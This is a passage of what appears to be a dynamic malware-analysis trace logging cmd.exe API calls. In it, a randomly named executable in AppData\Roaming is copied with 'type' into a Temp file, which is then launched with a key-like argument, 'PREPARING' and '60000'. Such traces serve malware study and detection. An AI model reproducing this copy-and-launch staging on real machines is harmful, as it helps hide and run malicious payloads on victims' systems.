\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0092.884] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0092.884] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x261ae0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0092.884] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0092.884] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0092.884] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0092.884] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0092.884] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0092.884] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0092.884] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0092.884] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0092.884] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0092.884] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0092.884] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0092.884] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0092.884] GetEnvironmentStringsW () returned 0x2624d0* [0092.884] FreeEnvironmentStringsW (penv=0x2624d0) returned 1 [0092.884] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a120640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.884] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0092.884] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0092.885] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0092.885] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0092.885] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0092.885] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0092.885] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0092.885] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0092.885] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0092.885] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16fc18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0092.885] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16fc18, lpFilePart=0x16fc14 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16fc14*="Desktop") returned 0x18 [0092.885] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0092.885] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f994 | out: lpFindFileData=0x16f994) returned 0x260b60 [0092.885] FindClose (in: hFindFile=0x260b60 | out: hFindFile=0x260b60) returned 1 [0092.885] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f994 | out: lpFindFileData=0x16f994) returned 0x260b60 [0092.885] FindClose (in: hFindFile=0x260b60 | out: hFindFile=0x260b60) returned 1 [0092.885] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f994 | out: lpFindFileData=0x16f994) returned 0x260b60 [0092.885] FindClose (in: hFindFile=0x260b60 | out: hFindFile=0x260b60) returned 1 [0092.885] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: 
"c:\\users\\eebsym5\\desktop")) returned 0x11 [0092.885] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0092.885] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0092.886] GetEnvironmentStringsW () returned 0x260380* [0092.886] FreeEnvironmentStringsW (penv=0x260380) returned 1 [0092.886] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0092.886] GetConsoleOutputCP () returned 0x1b5 [0092.886] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0092.886] GetUserDefaultLCID () returned 0x409 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a114950, cchData=8 | out: lpLCData=":") returned 2 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fd58, cchData=128 | out: lpLCData="0") returned 2 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fd58, cchData=128 | out: lpLCData="0") returned 2 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fd58, cchData=128 | out: lpLCData="1") returned 2 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a114940, cchData=8 | out: lpLCData="/") returned 2 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a114d80, cchData=32 | out: lpLCData="Mon") returned 4 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a114d40, cchData=32 | out: lpLCData="Tue") returned 4 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a114d00, cchData=32 | out: lpLCData="Wed") returned 4 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a114cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a114c80, cchData=32 | out: lpLCData="Fri") returned 4 [0092.887] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x36, lpLCData=0x4a114c40, cchData=32 | out: lpLCData="Sat") returned 4 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a114c00, cchData=32 | out: lpLCData="Sun") returned 4 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a114930, cchData=8 | out: lpLCData=".") returned 2 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a114920, cchData=8 | out: lpLCData=",") returned 2 [0092.887] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0092.888] GetConsoleTitleW (in: lpConsoleTitle=0x250a08, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.888] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0092.888] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0092.888] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0092.888] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0092.889] _wcsicmp (_String1="type", _String2=")") returned 75 [0092.889] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0092.889] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0092.889] _wcsicmp (_String1="IF", _String2="type") returned -11 [0092.889] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0092.889] _wcsicmp (_String1="REM", _String2="type") returned -2 [0092.889] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0092.893] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"") returned 68 [0092.893] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"") returned 68 [0092.893] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"") returned 71 [0092.893] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"") returned 71 
[0092.893] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"") returned 80 [0092.893] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"") returned 80 [0092.895] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.895] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.895] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.895] GetFileType (hFile=0x7) returned 0x2 [0092.895] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.895] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16fbec | out: lpMode=0x16fbec) returned 1 [0092.896] _dup (_FileHandle=1) returned 3 [0092.896] _close (_FileHandle=1) returned 0 [0092.896] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe", _String2="con") returned -53 [0092.896] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x16fbbc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0092.896] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0092.897] GetConsoleTitleW (in: lpConsoleTitle=0x16f9ec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.897] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0092.897] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0092.897] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0092.897] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0092.897] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0092.898] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x16f550, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 
lpFindFileData=0x16f550) returned 0x250f60 [0092.898] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0092.898] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0092.898] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0092.898] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16e45c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0092.898] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0092.898] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.898] GetFileType (hFile=0x54) returned 0x1 [0092.898] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.898] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x16e4b4 | out: lpFileSizeHigh=0x16e4b4*=0x0) returned 0x7d600 [0092.898] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.898] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.898] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.898] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.898] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.898] GetFileType (hFile=0x4c) returned 0x1 [0092.898] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.898] GetFileType (hFile=0x4c) returned 0x1 [0092.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.899] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, 
lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.899] GetFileType (hFile=0x4c) returned 0x1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] GetFileType (hFile=0x4c) returned 0x1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] GetFileType (hFile=0x4c) returned 0x1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] GetFileType (hFile=0x4c) returned 0x1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] GetFileType (hFile=0x4c) returned 0x1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, 
lpOverlapped=0x0) returned 1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] GetFileType (hFile=0x4c) returned 0x1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.900] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.900] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.900] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.900] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] GetFileType (hFile=0x4c) returned 0x1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] GetFileType (hFile=0x4c) returned 0x1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] GetFileType (hFile=0x4c) returned 0x1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] GetFileType (hFile=0x4c) returned 0x1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] WriteFile (in: hFile=0x4c, 
lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] GetFileType (hFile=0x4c) returned 0x1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] GetFileType (hFile=0x4c) returned 0x1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] GetFileType (hFile=0x4c) returned 0x1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] GetFileType (hFile=0x4c) returned 0x1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.901] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.901] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.901] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0092.901] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] GetFileType (hFile=0x4c) returned 0x1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] GetFileType (hFile=0x4c) returned 0x1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] GetFileType (hFile=0x4c) returned 0x1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] GetFileType (hFile=0x4c) returned 0x1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] GetFileType (hFile=0x4c) returned 0x1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] 
GetFileType (hFile=0x4c) returned 0x1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] GetFileType (hFile=0x4c) returned 0x1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] GetFileType (hFile=0x4c) returned 0x1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.902] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.902] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.902] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.902] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] GetFileType (hFile=0x4c) returned 0x1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] GetFileType (hFile=0x4c) returned 0x1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | 
out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] GetFileType (hFile=0x4c) returned 0x1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] GetFileType (hFile=0x4c) returned 0x1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] GetFileType (hFile=0x4c) returned 0x1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] GetFileType (hFile=0x4c) returned 0x1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] GetFileType (hFile=0x4c) returned 0x1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, 
lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] GetFileType (hFile=0x4c) returned 0x1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.903] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.903] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.903] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.903] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | 